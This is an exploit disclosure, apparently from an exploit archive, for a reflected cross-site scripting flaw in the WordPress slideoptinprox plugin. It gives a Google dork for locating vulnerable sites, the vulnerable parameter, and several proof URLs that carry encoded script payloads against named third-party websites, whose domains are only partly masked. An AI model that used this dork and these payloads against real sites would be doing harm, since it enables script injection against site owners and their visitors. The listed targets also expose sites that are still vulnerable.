|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| |[*] Exploit Title: Wordpress slideoptinprox Plugin Cross site scripting vulnerability | |[*] Google Dork: inurl:"/wp-content/plugins/slideoptinprox/" | |[*] Date : Date: 2015-01-08 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*]Vendor Homepage : https://pluginu.com/slideoptinprox/ | |[*] Tested on: Windows 8.1,Kali Linux | |-------------------------------------------------------------------------| | |[*] Location : [localhost]/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=[XSS] | |-------------------------------------------------------------------------| |[*] Proof: | |[*] http://www.fishingfanatic.XXXus/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E | |[*] http://www.beziehung-XXretten24.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E | |[*] http://voiceacting.coXXm/blog//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E | |[*] http://drdebranixXXXom/wp-content/plugins/slideoptinprox/app/view.php?id=2%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E | |[*] http://pinguin-werkstatXt.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E| |-------------------------------------------------------------------------| |[*] Discovered By : 4L1R3Z4 | |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|